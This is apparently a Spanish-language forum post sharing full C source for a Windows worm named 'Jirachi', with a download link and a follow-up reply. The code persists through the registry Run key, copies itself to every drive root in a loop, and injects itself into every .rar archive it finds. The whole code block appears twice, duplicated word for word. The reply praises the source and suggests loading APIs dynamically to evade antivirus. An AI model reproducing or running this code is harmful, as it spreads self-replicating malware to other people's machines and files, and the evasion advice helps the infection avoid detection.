Aquí les dejo el código:
http://www.megaupload.com/?d=LJN95HTI
Código:
#include <windows.h>
#include "Rar binary.c"
#include "Image.c"
/* Forward declarations for the helpers defined after main(). */
void Drop_file(char *File, char *Data, long Data_size);
void Execute(char *Program);
void Check_folder(char *Folder);
void Check_rar(char *File);
/*
 * File-scope strings and buffers shared by every routine below.
 * For an analyst these fixed names are the host artifacts the sample leaves
 * behind: a mutex and a Run-key value both named "Jirachi", "Jirachi.exe"
 * and "Jirachi-Rar.exe" in the system directory, and "Jirachi.exe" plus
 * "Jirachi.gif" in the root of every drive it touches.
 */
char Worm_name[] = "Jirachi";                                        /* mutex name and Run-key value name (see main) */
char Run_key[] = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"; /* HKLM autorun key opened in main */
char Worm_exe[] = "\\Jirachi.exe";                                   /* appended to the system dir; &Worm_exe[1] appended to a drive root */
char Rar_exe[] = "\\Jirachi-Rar.exe";                                /* name under which Rar_binary (from "Rar binary.c") is dropped */
char Root[] = "\x00:\\";                                             /* drive-root template; Root[0] is overwritten with 'C'..'Z' */
char Image_name[] = "Jirachi.gif";                                   /* name under which Image_binary (from "Image.c") is dropped at each root */
char All_files[] = "*.*";                                            /* FindFirstFile pattern used by Check_folder */
char Bar[] = "\\";                                                   /* separator appended when Check_folder recurses into a directory */
char Rar_file[] = ".rar";                                            /* extension Check_folder compares against after CharLower */
char Quotes[] = "\"";                                                /* fragments of the command line assembled in Check_rar */
char Rar_params[] = "\" a -ep \"";
char Space[] = "\" \"";
char Worm_path[MAX_PATH];                                            /* full path of the running executable (GetModuleFileName in main) */
char Rar_copy[MAX_PATH];                                             /* full path of the dropped Rar_exe; set in main, read in Check_rar */
/*
 * Entry point. Behaviour is chosen by whether the "Jirachi" value already
 * exists under the HKLM Run key:
 *   - not yet registered: copy self to <system dir>\Jirachi.exe, write that
 *     path as the Run value, launch the copy and exit;
 *   - already registered (i.e. running as the persistent copy): scan every
 *     fixed/removable/remote drive once for .rar archives via Check_folder,
 *     then loop forever, every 5 s re-copying self and Jirachi.gif to each
 *     such drive root.
 * Both paths first write Rar_binary to <system dir>\Jirachi-Rar.exe.
 * Detection-relevant side effects: mutex "Jirachi", HKLM Run value
 * "Jirachi", the dropped files above, and the child process started by
 * Execute(). Because the Run key is under HKLM, RegOpenKeyEx fails for a
 * process without write rights there and the program simply returns.
 */
int main()
{
    HANDLE Mutex_handle;
    HKEY Key_handle;
    HMODULE My_handle;
    char System_path[MAX_PATH];
    char Worm_copy[MAX_PATH];
    UINT Drive_type;
    char Image_copy[MAX_PATH];

    /* Single-instance guard: exit if CreateMutex left any error code set,
     * which includes ERROR_ALREADY_EXISTS when another instance holds it. */
    Mutex_handle = CreateMutex(0, 0, Worm_name);
    if (GetLastError() != ERROR_SUCCESS) return 0;

    /* Resolve the path of the running executable into the global Worm_path. */
    My_handle = GetModuleHandle(NULL);
    if (My_handle == NULL) return 0;
    if (GetModuleFileName(My_handle, Worm_path, MAX_PATH) == 0) return 0;
    if (GetSystemDirectory(System_path, MAX_PATH) == 0) return 0;

    /* Drop the embedded RAR binary into the system directory; Check_rar runs it later.
     * The "- 1" presumably skips a string literal's terminating NUL — confirm in "Rar binary.c". */
    strcpy(Rar_copy, System_path);
    strcat(Rar_copy, Rar_exe);
    Drop_file(Rar_copy, Rar_binary, sizeof(Rar_binary) - 1);

    /* One handle opened with both query and set rights serves both branches below. */
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, Run_key, 0, KEY_QUERY_VALUE + KEY_SET_VALUE, &Key_handle) != ERROR_SUCCESS) return 0;
    if (RegQueryValueEx(Key_handle, Worm_name, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
    {
        /* Already registered: this is the persistent copy. */
        RegCloseKey(Key_handle);

        /* One-time pass over C: .. Z: looking for .rar archives. */
        for (Root[0] = 'C'; Root[0] <= 'Z'; Root[0]++)
        {
            Drive_type = GetDriveType(Root);
            if ((Drive_type == DRIVE_REMOVABLE) || (Drive_type == DRIVE_FIXED) || (Drive_type == DRIVE_REMOTE)) Check_folder(Root);
        }

        /* Propagation loop; never returns, so Mutex_handle stays held for the process lifetime. */
        while (TRUE)
        {
            for (Root[0] = 'C'; Root[0] <= 'Z'; Root[0]++)
            {
                Drive_type = GetDriveType(Root);
                if ((Drive_type == DRIVE_REMOVABLE) || (Drive_type == DRIVE_FIXED) || (Drive_type == DRIVE_REMOTE))
                {
                    /* Copy self to <drive>:\Jirachi.exe; bFailIfExists = TRUE, so an existing file is left alone. */
                    strcpy(Worm_copy, Root);
                    strcat(Worm_copy, &Worm_exe[1]);   /* skip the leading backslash; Root already ends with one */
                    CopyFile(Worm_path, Worm_copy, TRUE);
                    SetFileAttributes(Worm_copy, FILE_ATTRIBUTE_READONLY);

                    /* Drop the embedded image next to it as <drive>:\Jirachi.gif. */
                    strcpy(Image_copy, Root);
                    strcat(Image_copy, Image_name);
                    Drop_file(Image_copy, Image_binary, sizeof(Image_binary) -1);
                }
            }
            Sleep(5000);
        }
    }
    else
    {
        /* First run: install under the system directory and persist via the Run key. */
        strcpy(Worm_copy, System_path);
        strcat(Worm_copy, Worm_exe);
        if (CopyFile(Worm_path, Worm_copy, TRUE) == 0) return 0;
        SetFileAttributes(Worm_copy, FILE_ATTRIBUTE_READONLY);
        /* Value data length is strlen(), i.e. written without the terminating NUL. */
        if (RegSetValueEx(Key_handle, Worm_name, 0, REG_SZ, Worm_copy, strlen(Worm_copy)) != ERROR_SUCCESS) return 0;
        RegCloseKey(Key_handle);
        /* Mutex released before the installed copy is launched — presumably so
         * that copy's own CreateMutex does not see an existing instance. */
        CloseHandle(Mutex_handle);
        Execute(Worm_copy);
    }
    return 0;
}
/*
 * Write Data_size bytes of Data to a new file at File, replacing any existing
 * file (CREATE_ALWAYS) and marking it read-only at creation.
 * Failure to open is silently ignored, and the WriteFile result is never
 * checked, so a short or failed write leaves a partial file with no signal
 * to the caller.
 */
void Drop_file(char *File, char *Data, long Data_size)
{
    HANDLE My_handle;
    DWORD Bytes_written;
    My_handle = CreateFile(File, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_READONLY, NULL);
    if (My_handle == INVALID_HANDLE_VALUE) return;
    WriteFile(My_handle, Data, Data_size, &Bytes_written, NULL);   /* Bytes_written is set but never inspected */
    CloseHandle(My_handle);
    return;
}
/*
 * Start Program as a child process. lpApplicationName is NULL, so Program is
 * parsed as a complete command line (callers pass either a bare executable
 * path or the quoted RAR command built in Check_rar). The child's process and
 * thread handles are closed immediately; the caller is not told whether the
 * launch succeeded. From a monitoring standpoint this is the single process
 * creation point of the sample.
 */
void Execute(char *Program)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    if (CreateProcess(NULL, Program, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi) == 0) return;
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return;
}
/*
 * Recursively walk Folder (expected to end in a backslash, which Root and the
 * recursive call below provide) and hand every entry whose last four
 * characters lower-case to ".rar" to Check_rar. Directories are descended
 * into; any entry whose name starts with '.' is skipped, which covers "."
 * and ".." but also any dot-prefixed name. Only entries carrying
 * FILE_ATTRIBUTE_ARCHIVE are tested for the extension.
 * The first directory entry is processed inline and the remainder in the
 * FindNextFile loop, so the same body appears twice. Two things to be aware
 * of when reading it: Find_handle is not compared against
 * INVALID_HANDLE_VALUE before WFD is read, and every path is assembled with
 * unbounded strcpy/strcat into MAX_PATH-sized stack buffers.
 */
void Check_folder(char *Folder)
{
    char Find_all_files[MAX_PATH];
    WIN32_FIND_DATA WFD;
    HANDLE Find_handle;
    char File[MAX_PATH];
    char Extension[5];   /* four extension characters plus the terminator */

    /* Search pattern is Folder followed by "*.*". */
    strcpy(Find_all_files, Folder);
    strcat(Find_all_files, All_files);
    Find_handle = FindFirstFile(Find_all_files, &WFD);

    /* First entry. */
    if (WFD.cFileName[0] != '.')
    {
        strcpy(File, Folder);
        strcat(File, WFD.cFileName);
        if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == FILE_ATTRIBUTE_DIRECTORY)
        {
            strcat(File, Bar);   /* trailing backslash, so the recursive call's pattern is well-formed */
            Check_folder(File);
        }
        if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE) == FILE_ATTRIBUTE_ARCHIVE)
        {
            /* Last four characters, lower-cased, compared with ".rar". */
            strcpy(Extension, &File[strlen(File) - 4]);
            CharLower(Extension);
            if (strcmp(Extension, Rar_file) == 0)
            {
                Check_rar(File);
            }
        }
    }

    /* Remaining entries: identical handling. */
    while (FindNextFile(Find_handle, &WFD))
    {
        if (WFD.cFileName[0] != '.')
        {
            strcpy(File, Folder);
            strcat(File, WFD.cFileName);
            if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == FILE_ATTRIBUTE_DIRECTORY)
            {
                strcat(File, Bar);
                Check_folder(File);
            }
            if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE) == FILE_ATTRIBUTE_ARCHIVE)
            {
                strcpy(Extension, &File[strlen(File) - 4]);
                CharLower(Extension);
                if (strcmp(Extension, Rar_file) == 0)
                {
                    Check_rar(File);
                }
            }
        }
    }
    FindClose(Find_handle);
    return;
}
/*
 * Build and run the command line
 *     "<Rar_copy>" a -ep "<File>" "<Worm_path>"
 * i.e. invoke the dropped RAR binary to add the running executable to the
 * archive File (RAR's -ep switch is passed through as written; it is
 * documented as storing names without their path). This is the
 * archive-infection step: every .rar located by Check_folder ends up
 * containing a copy of the worm. Command is MAX_PATH * 3 bytes and is filled
 * with unbounded strcat from two MAX_PATH paths plus the fixed fragments.
 * For defenders, a Jirachi-Rar.exe process with this argument shape is the
 * observable event.
 */
void Check_rar(char *File)
{
    char Command[MAX_PATH * 3];
    strcpy(Command, Quotes);
    strcat(Command, Rar_copy);
    strcat(Command, Rar_params);   /* closes the first quote, then: a -ep " */
    strcat(Command, File);
    strcat(Command, Space);        /* closing quote, space, opening quote */
    strcat(Command, Worm_path);
    strcat(Command, Quotes);
    Execute(Command);
    return;
}
#include "Rar binary.c"
#include "Image.c"
/* Forward declarations for the helpers defined after main(). */
void Drop_file(char *File, char *Data, long Data_size);
void Execute(char *Program);
void Check_folder(char *Folder);
void Check_rar(char *File);
/*
 * File-scope strings and buffers shared by every routine below.
 * For an analyst these fixed names are the host artifacts the sample leaves
 * behind: a mutex and a Run-key value both named "Jirachi", "Jirachi.exe"
 * and "Jirachi-Rar.exe" in the system directory, and "Jirachi.exe" plus
 * "Jirachi.gif" in the root of every drive it touches.
 */
char Worm_name[] = "Jirachi";                                        /* mutex name and Run-key value name (see main) */
char Run_key[] = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"; /* HKLM autorun key opened in main */
char Worm_exe[] = "\\Jirachi.exe";                                   /* appended to the system dir; &Worm_exe[1] appended to a drive root */
char Rar_exe[] = "\\Jirachi-Rar.exe";                                /* name under which Rar_binary (from "Rar binary.c") is dropped */
char Root[] = "\x00:\\";                                             /* drive-root template; Root[0] is overwritten with 'C'..'Z' */
char Image_name[] = "Jirachi.gif";                                   /* name under which Image_binary (from "Image.c") is dropped at each root */
char All_files[] = "*.*";                                            /* FindFirstFile pattern used by Check_folder */
char Bar[] = "\\";                                                   /* separator appended when Check_folder recurses into a directory */
char Rar_file[] = ".rar";                                            /* extension Check_folder compares against after CharLower */
char Quotes[] = "\"";                                                /* fragments of the command line assembled in Check_rar */
char Rar_params[] = "\" a -ep \"";
char Space[] = "\" \"";
char Worm_path[MAX_PATH];                                            /* full path of the running executable (GetModuleFileName in main) */
char Rar_copy[MAX_PATH];                                             /* full path of the dropped Rar_exe; set in main, read in Check_rar */
/*
 * Entry point. Behaviour is chosen by whether the "Jirachi" value already
 * exists under the HKLM Run key:
 *   - not yet registered: copy self to <system dir>\Jirachi.exe, write that
 *     path as the Run value, launch the copy and exit;
 *   - already registered (i.e. running as the persistent copy): scan every
 *     fixed/removable/remote drive once for .rar archives via Check_folder,
 *     then loop forever, every 5 s re-copying self and Jirachi.gif to each
 *     such drive root.
 * Both paths first write Rar_binary to <system dir>\Jirachi-Rar.exe.
 * Detection-relevant side effects: mutex "Jirachi", HKLM Run value
 * "Jirachi", the dropped files above, and the child process started by
 * Execute(). Because the Run key is under HKLM, RegOpenKeyEx fails for a
 * process without write rights there and the program simply returns.
 */
int main()
{
    HANDLE Mutex_handle;
    HKEY Key_handle;
    HMODULE My_handle;
    char System_path[MAX_PATH];
    char Worm_copy[MAX_PATH];
    UINT Drive_type;
    char Image_copy[MAX_PATH];

    /* Single-instance guard: exit if CreateMutex left any error code set,
     * which includes ERROR_ALREADY_EXISTS when another instance holds it. */
    Mutex_handle = CreateMutex(0, 0, Worm_name);
    if (GetLastError() != ERROR_SUCCESS) return 0;

    /* Resolve the path of the running executable into the global Worm_path. */
    My_handle = GetModuleHandle(NULL);
    if (My_handle == NULL) return 0;
    if (GetModuleFileName(My_handle, Worm_path, MAX_PATH) == 0) return 0;
    if (GetSystemDirectory(System_path, MAX_PATH) == 0) return 0;

    /* Drop the embedded RAR binary into the system directory; Check_rar runs it later.
     * The "- 1" presumably skips a string literal's terminating NUL — confirm in "Rar binary.c". */
    strcpy(Rar_copy, System_path);
    strcat(Rar_copy, Rar_exe);
    Drop_file(Rar_copy, Rar_binary, sizeof(Rar_binary) - 1);

    /* One handle opened with both query and set rights serves both branches below. */
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, Run_key, 0, KEY_QUERY_VALUE + KEY_SET_VALUE, &Key_handle) != ERROR_SUCCESS) return 0;
    if (RegQueryValueEx(Key_handle, Worm_name, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
    {
        /* Already registered: this is the persistent copy. */
        RegCloseKey(Key_handle);

        /* One-time pass over C: .. Z: looking for .rar archives. */
        for (Root[0] = 'C'; Root[0] <= 'Z'; Root[0]++)
        {
            Drive_type = GetDriveType(Root);
            if ((Drive_type == DRIVE_REMOVABLE) || (Drive_type == DRIVE_FIXED) || (Drive_type == DRIVE_REMOTE)) Check_folder(Root);
        }

        /* Propagation loop; never returns, so Mutex_handle stays held for the process lifetime. */
        while (TRUE)
        {
            for (Root[0] = 'C'; Root[0] <= 'Z'; Root[0]++)
            {
                Drive_type = GetDriveType(Root);
                if ((Drive_type == DRIVE_REMOVABLE) || (Drive_type == DRIVE_FIXED) || (Drive_type == DRIVE_REMOTE))
                {
                    /* Copy self to <drive>:\Jirachi.exe; bFailIfExists = TRUE, so an existing file is left alone. */
                    strcpy(Worm_copy, Root);
                    strcat(Worm_copy, &Worm_exe[1]);   /* skip the leading backslash; Root already ends with one */
                    CopyFile(Worm_path, Worm_copy, TRUE);
                    SetFileAttributes(Worm_copy, FILE_ATTRIBUTE_READONLY);

                    /* Drop the embedded image next to it as <drive>:\Jirachi.gif. */
                    strcpy(Image_copy, Root);
                    strcat(Image_copy, Image_name);
                    Drop_file(Image_copy, Image_binary, sizeof(Image_binary) -1);
                }
            }
            Sleep(5000);
        }
    }
    else
    {
        /* First run: install under the system directory and persist via the Run key. */
        strcpy(Worm_copy, System_path);
        strcat(Worm_copy, Worm_exe);
        if (CopyFile(Worm_path, Worm_copy, TRUE) == 0) return 0;
        SetFileAttributes(Worm_copy, FILE_ATTRIBUTE_READONLY);
        /* Value data length is strlen(), i.e. written without the terminating NUL. */
        if (RegSetValueEx(Key_handle, Worm_name, 0, REG_SZ, Worm_copy, strlen(Worm_copy)) != ERROR_SUCCESS) return 0;
        RegCloseKey(Key_handle);
        /* Mutex released before the installed copy is launched — presumably so
         * that copy's own CreateMutex does not see an existing instance. */
        CloseHandle(Mutex_handle);
        Execute(Worm_copy);
    }
    return 0;
}
/*
 * Write Data_size bytes of Data to a new file at File, replacing any existing
 * file (CREATE_ALWAYS) and marking it read-only at creation.
 * Failure to open is silently ignored, and the WriteFile result is never
 * checked, so a short or failed write leaves a partial file with no signal
 * to the caller.
 */
void Drop_file(char *File, char *Data, long Data_size)
{
    HANDLE My_handle;
    DWORD Bytes_written;
    My_handle = CreateFile(File, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_READONLY, NULL);
    if (My_handle == INVALID_HANDLE_VALUE) return;
    WriteFile(My_handle, Data, Data_size, &Bytes_written, NULL);   /* Bytes_written is set but never inspected */
    CloseHandle(My_handle);
    return;
}
/*
 * Start Program as a child process. lpApplicationName is NULL, so Program is
 * parsed as a complete command line (callers pass either a bare executable
 * path or the quoted RAR command built in Check_rar). The child's process and
 * thread handles are closed immediately; the caller is not told whether the
 * launch succeeded. From a monitoring standpoint this is the single process
 * creation point of the sample.
 */
void Execute(char *Program)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    if (CreateProcess(NULL, Program, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi) == 0) return;
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return;
}
/*
 * Recursively walk Folder (expected to end in a backslash, which Root and the
 * recursive call below provide) and hand every entry whose last four
 * characters lower-case to ".rar" to Check_rar. Directories are descended
 * into; any entry whose name starts with '.' is skipped, which covers "."
 * and ".." but also any dot-prefixed name. Only entries carrying
 * FILE_ATTRIBUTE_ARCHIVE are tested for the extension.
 * The first directory entry is processed inline and the remainder in the
 * FindNextFile loop, so the same body appears twice. Two things to be aware
 * of when reading it: Find_handle is not compared against
 * INVALID_HANDLE_VALUE before WFD is read, and every path is assembled with
 * unbounded strcpy/strcat into MAX_PATH-sized stack buffers.
 */
void Check_folder(char *Folder)
{
    char Find_all_files[MAX_PATH];
    WIN32_FIND_DATA WFD;
    HANDLE Find_handle;
    char File[MAX_PATH];
    char Extension[5];   /* four extension characters plus the terminator */

    /* Search pattern is Folder followed by "*.*". */
    strcpy(Find_all_files, Folder);
    strcat(Find_all_files, All_files);
    Find_handle = FindFirstFile(Find_all_files, &WFD);

    /* First entry. */
    if (WFD.cFileName[0] != '.')
    {
        strcpy(File, Folder);
        strcat(File, WFD.cFileName);
        if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == FILE_ATTRIBUTE_DIRECTORY)
        {
            strcat(File, Bar);   /* trailing backslash, so the recursive call's pattern is well-formed */
            Check_folder(File);
        }
        if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE) == FILE_ATTRIBUTE_ARCHIVE)
        {
            /* Last four characters, lower-cased, compared with ".rar". */
            strcpy(Extension, &File[strlen(File) - 4]);
            CharLower(Extension);
            if (strcmp(Extension, Rar_file) == 0)
            {
                Check_rar(File);
            }
        }
    }

    /* Remaining entries: identical handling. */
    while (FindNextFile(Find_handle, &WFD))
    {
        if (WFD.cFileName[0] != '.')
        {
            strcpy(File, Folder);
            strcat(File, WFD.cFileName);
            if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == FILE_ATTRIBUTE_DIRECTORY)
            {
                strcat(File, Bar);
                Check_folder(File);
            }
            if ((WFD.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE) == FILE_ATTRIBUTE_ARCHIVE)
            {
                strcpy(Extension, &File[strlen(File) - 4]);
                CharLower(Extension);
                if (strcmp(Extension, Rar_file) == 0)
                {
                    Check_rar(File);
                }
            }
        }
    }
    FindClose(Find_handle);
    return;
}
/*
 * Build and run the command line
 *     "<Rar_copy>" a -ep "<File>" "<Worm_path>"
 * i.e. invoke the dropped RAR binary to add the running executable to the
 * archive File (RAR's -ep switch is passed through as written; it is
 * documented as storing names without their path). This is the
 * archive-infection step: every .rar located by Check_folder ends up
 * containing a copy of the worm. Command is MAX_PATH * 3 bytes and is filled
 * with unbounded strcat from two MAX_PATH paths plus the fixed fragments.
 * For defenders, a Jirachi-Rar.exe process with this argument shape is the
 * observable event.
 */
void Check_rar(char *File)
{
    char Command[MAX_PATH * 3];
    strcpy(Command, Quotes);
    strcat(Command, Rar_copy);
    strcat(Command, Rar_params);   /* closes the first quote, then: a -ep " */
    strcat(Command, File);
    strcat(Command, Space);        /* closing quote, space, opening quote */
    strcat(Command, Worm_path);
    strcat(Command, Quotes);
    Execute(Command);
    return;
}
















pues aparte de lo que dijo R.N.A agrego que requiere privilegios pero con la gran cantidad de instalaciones default que hay por alli eso no debe ser problema para los AV tienes que llamar las Apis dinamicamente desde las dll como es un solo thread no debe de ser problema, Usaste Recursividad
eso es de resaltar
En fin me parece bueno el source 




